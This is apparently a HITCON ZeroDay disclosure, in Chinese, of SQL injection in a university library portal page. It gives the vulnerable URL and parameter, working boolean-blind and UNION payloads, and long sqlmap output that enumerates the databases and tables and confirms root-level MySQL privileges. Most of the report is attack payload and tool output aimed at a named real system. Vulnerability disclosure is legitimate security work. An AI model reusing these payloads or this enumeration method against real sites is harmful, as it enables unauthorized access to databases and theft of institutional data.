国立高雄科技大学某站SQL注入#root权限 - HITCON ZeroDay

国立高雄科技大学建工-燕巢校区图书馆SQL注入#root权限
SQL位置：
http://www.lib.kuas.edu.tw/portal_people.php?id=2
id参数过滤不严导致SQL注入
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 37 HTTP(s) requests:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 5546=5546

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x53647462436b626368474c7074675a796e4357446d6a6b75754764714270535a536e657057577255,0x717a7a6271),NULL,NULL,NULL-- neia

[01:58:51] [INFO] testing MySQL
[01:58:53] [INFO] confirming MySQL
[01:58:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.30, Apache 2.2.34
back-end DBMS: MySQL >= 5.0.0
[01:58:56] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.lib.kuas.edu.tw'

确认影响库：（11个）
[01:59:17] [INFO] fetching database names
[01:59:18] [INFO] used SQL query returns 11 entries
[01:59:19] [INFO] retrieved: information_schema
[01:59:20] [INFO] retrieved: RAMS2013
[01:59:21] [INFO] retrieved: fb5
[01:59:22] [INFO] retrieved: fb5_20171102
[01:59:23] [INFO] retrieved: kuas
[01:59:24] [INFO] retrieved: kuas_old
[01:59:25] [INFO] retrieved: kuasspace
[01:59:27] [INFO] retrieved: mysql
[01:59:28] [INFO] retrieved: performance_schema
[01:59:29] [INFO] retrieved: portal
[01:59:30] [INFO] retrieved: test
available databases [11]:
[] fb5
[] fb5_20171102
[] information_schema
[] kuas
[] kuas_old
[] kuasspace
[] mysql
[] performance_schema
[] portal
[] RAMS2013
[*] test

[01:59:30] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.lib.kuas.edu.tw'

查看数据量：（数据太多懒得跑了，第一个库就有900+，看来数据肯定不少）
[02:00:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[02:00:01] [INFO] fetching database names
[02:00:01] [INFO] used SQL query returns 11 entries
[02:00:01] [INFO] resumed: information_schema
[02:00:01] [INFO] resumed: RAMS2013
[02:00:01] [INFO] resumed: fb5
[02:00:01] [INFO] resumed: fb5_20171102
[02:00:01] [INFO] resumed: kuas
[02:00:01] [INFO] resumed: kuas_old
[02:00:01] [INFO] resumed: kuasspace
[02:00:01] [INFO] resumed: mysql
[02:00:01] [INFO] resumed: performance_schema
[02:00:01] [INFO] resumed: portal
[02:00:01] [INFO] resumed: test
[02:00:02] [INFO] fetching tables for databases: 'RAMS2013, fb5, fb5_20171102, information_schema, kuas, kuas_old, kuasspace, mysql, performance_schema, portal, test'
[02:00:03] [INFO] used SQL query returns 930 entries
[02:00:04] [INFO] retrieved: "information_schema","CHARACTER_SETS"
[02:00:05] [INFO] retrieved: "information_schema","COLLATIONS"
[02:00:06] [INFO] retrieved: "information_schema","COLLATION_CHARACTER_SET_APPLICABILITY"
[02:00:07] [INFO] retrieved: "information_schema","COLUMNS"
[02:00:09] [INFO] retrieved: "information_schema","COLUMN_PRIVILEGES"
[02:00:10] [INFO] retrieved: "information_schema","ENGINES"
[02:00:11] [INFO] retrieved: "information_schema","EVENTS"
[02:00:12] [INFO] retrieved: "information_schema","FILES"
[02:00:13] [INFO] retrieved: "information_schema","GLOBAL_STATUS"
[02:00:14] [INFO] retrieved: "information_schema","GLOBAL_VARIABLES"
[02:00:15] [INFO] retrieved: "information_schema","KEY_COLUMN_USAGE"
[02:00:16] [INFO] retrieved: "information_schema","OPTIMIZER_TRACE"
[02:00:17] [INFO] retrieved: "information_schema","PARAMETERS"
[02:00:18] [INFO] retrieved: "information_schema","PARTITIONS"
[02:00:19] [INFO] retrieved: "information_schema","PLUGINS"
[02:00:20] [INFO] retrieved: "information_schema","PROCESSLIST"
[02:00:21] [INFO] retrieved: "information_schema","PROFILING"
[02:00:22] [INFO] retrieved: "information_schema","REFERENTIAL_CONSTRAINTS"
[02:00:23] [INFO] retrieved: "information_schema","ROUTINES"
[02:00:24] [INFO] retrieved: "information_schema","SCHEMATA"
[02:00:25] [INFO] retrieved: "information_schema","SCHEMA_PRIVILEGES"
[02:00:26] [INFO] retrieved: "information_schema","SESSION_STATUS"
[02:00:27] [INFO] retrieved: "information_schema","SESSION_VARIABLES"
[02:00:28] [INFO] retrieved: "information_schema","STATISTICS"
[02:00:29] [INFO] retrieved: "information_schema","TABLES"
[02:00:30] [INFO] retrieved: "information_schema","TABLESPACES"

[02:00:31] [WARNING] user aborted during enumeration. sqlmap will display partial output

看到上面数据量以及，库的情况猜测注入点为ROOT权限，确认一下
很详细
database management system users privileges:
[] ''@'localhost' [1]:
privilege: USAGE
[] ''@'protal' [1]:
privilege: USAGE
[] 'flysheet'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[] 'kuasspace@2017'@'127.0.0.1' [1]:
privilege: USAGE
[] 'root'@'127.0.0.1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[] 'root'@'::1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[] 'root'@'protal' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

[02:04:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.lib.kuas.edu.tw'